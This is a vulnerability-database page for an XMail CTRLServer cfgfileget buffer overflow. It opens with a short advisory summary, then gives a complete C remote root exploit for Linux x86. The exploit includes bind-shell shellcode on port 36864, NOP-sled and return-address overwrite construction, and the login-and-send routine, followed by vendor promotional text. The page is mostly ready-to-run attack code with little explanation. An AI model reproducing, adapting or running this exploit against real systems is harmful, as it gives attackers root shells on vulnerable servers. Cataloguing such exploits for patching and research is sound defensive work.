Vulners
Lucene search
Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands Vulnerability
source: http://www.securityfocus.com/bid/2360/info
Versions of CTRLServer are vulnerable to malicious user-supplied input. A failure to properly bounds-check data passed to the cfgfileget() command leads to an overflow, which, properly exploited, can result in remote execution of malicious code with root privilege.
/*
* XMail CTRLServer remote root exploit for linux/x86
*
* Author: isno([email protected]), 01/2001
*
* NOTE:
* Because the buffer is too small to set many of NOP before shellcode,it
* is deficult to guess ret.And it cannot brute force offset,because once
* sending overflow code to the CTRLServer, XMail will be crashed.
*
*
* Tested on:
* RedHat Linux 6.0 i386 XMail 0.65
*
* Compile:
* gcc -o xmailx xmailx.c
*
* Usage:
* ./xmailx username passwd targethost [offset]
* and telnet targethost 36864
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define BSIZE 512
#define RETADDRESS 0xbc7fe988 /* maybe 0xbffff9a4 in some box */
#define OFFSET 20
#define NOP 0x90
#define PORT 6017
void usage(char *app);
/* shellcode bind TCP port 36864 */
char shellcode[]=
/* main: */
"\xeb\x72" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
/* socket() */
"\x29\xc0" /* subl %eax, %eax */
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
"\x40" /* incl %eax */
"\x89\xc3" /* movl %eax, %ebx */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x40" /* incl %eax */
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
/* bind() */
"\x43" /* incl %ebx */
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
"\x88\x46\x08" /* movb %al, 0x08(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x89\xc2" /* movl %eax, %edx */
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
"\xb0\x90" /* movb $0x90, %al */
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
"\x43" /* incl %ebx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
"\xb0\x66" /* movb $0x66, %al */
"\x43" /* incl %ebx */
"\xcd\x80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */
"\xb0\x3f" /* movb $0x3f, %al */
"\x29\xc9" /* subl %ecx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
"\xb0\x0b" /* movb $0x0b, %al */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\x89\xff\xff\xff" /* call start */
"/bin/sh";
/* 128 bytes */
int main(int argc, char *argv[])
{
char buff[BSIZE+1];
char sendbuf[600]="cfgfileget\t";
char loginbuf[200];
char rcvbuf[1024];
char *username;
char *password;
char *target;
int i;
int noprange;
int offset=OFFSET;
u_long sp=RETADDRESS;
u_long addr;
int skt;
long inet;
struct hostent *host;
struct sockaddr_in sin;
if(argc<4)
{
usage(argv[0]);
return 1;
}
username = argv[1];
password = argv[2];
target = argv[3];
if(argc>4)
{
offset = atoi(argv[4]);
}
addr=sp - (long)offset;
noprange=256+4-strlen(shellcode);
memset(buff, NOP, BSIZE);
memcpy(buff+(long)noprange, shellcode, strlen(shellcode));
for (i = 256+4; i < BSIZE; i += 4)
*((int *) &buff[i]) = addr;
buff[BSIZE]='\0';
fprintf(stderr, "\nUse retAddress: 0x%08x\n\n",addr);
strcat(sendbuf, buff);
strcat(sendbuf, "\r\n");
strcpy(loginbuf,username);
strcat(loginbuf,"\t"); /* command should splitted by TAB */
strcat(loginbuf,password);
strcat(loginbuf,"\r\n");
skt = socket(PF_INET, SOCK_STREAM, 0);
if(skt == 0)
{
perror("socket()");
exit(-1);
}
inet = inet_addr(target);
if(inet == -1)
{
if(host = gethostbyname(target))
memcpy(&inet, host->h_addr, 4);
else
inet = -1;
if(inet == -1)
{
fprintf(stderr, "Cant resolv %s!!\n", target);
exit (-1);
}
}
sin.sin_family = PF_INET;
sin.sin_port = htons(PORT);
sin.sin_addr.s_addr = inet;
if (connect (skt, (struct sockaddr *)&sin, sizeof(sin)) < 0)
{
perror("Connect()");
exit(-1);
}
read(skt, rcvbuf, 1024);
fprintf(stderr, "%s\n", rcvbuf);
memset(rcvbuf, 0x0, 1024);
fprintf(stderr, "Starting to login...\n");
write(skt, loginbuf, strlen(loginbuf));
sleep(1);
read(skt, rcvbuf, 1024);
if(strstr(rcvbuf,"00000")==NULL)
{
perror("Login failed!");
exit(-1);
}
write(skt, sendbuf, strlen(sendbuf));
close(skt);
fprintf(stderr, "Success!now telnet %s 36864\n", target);
return 1;
}
void usage(char *app)
{
fprintf(stderr, "\nXMail 0.65/0.66 CTRLSvr exploit\n\n");
fprintf(stderr, "Usage: %s username passwd targethost [offset]\n\n", app);
return;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1